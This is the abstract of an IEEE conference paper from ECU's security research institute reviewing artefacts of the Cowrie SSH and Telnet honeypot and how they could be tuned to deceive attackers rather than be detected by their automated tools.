Review and analysis of Cowrie artefacts and their potential to be used deceptively
Proceedings of 6th Annual Conference on Computational Science & Computational Intelligence
Institute of Electrical and Electronics Engineers (IEEE)
School of Science / ECU Security Research Institute
Honeypots are progressively becoming a fundamental cybersecurity tool to detect, prevent and record new threats and attack methodologies used by attackers to penetrate systems. The current technology is advancing rapidly; with the use of virtualisation, and most recently, virtual containers, the deployment of honeypots has become increasingly easier. A varied collection of open source honeypots such as Cowrie are available today, which can be easily downloaded and deployed within minutes-with default settings. Cowrie is a medium-interaction secure shell (SSH) and Telnet honeypot intended to log brute force and shell interaction attacks. However, the current issue with the default Cowrie configuration is that it is easily detected by adversaries using automated scripts and tools. To increase Cowrie's deceptive capabilities, it is essential to understand, modify, and leverage all capabilities of the honeypot. However, this process is complex, because there are no standard frameworks to interpret the artefacts used by the Cowrie honeypot and how these artefacts link to the type of deceptiveness presented to the cyber-attacker. Therefore, there is a need for some type of infrastructure that can interpret these basic deception techniques and tools, and later developing them into feasible cybersecurity defence mechanisms. This study pursues to develop an understanding about its capabilities, and how these capabilities can be used to bait attackers. The resulting annotations can help cybersecurity defenders better understand the effectiveness of the Cowrie artefacts and how they can be used deceptively.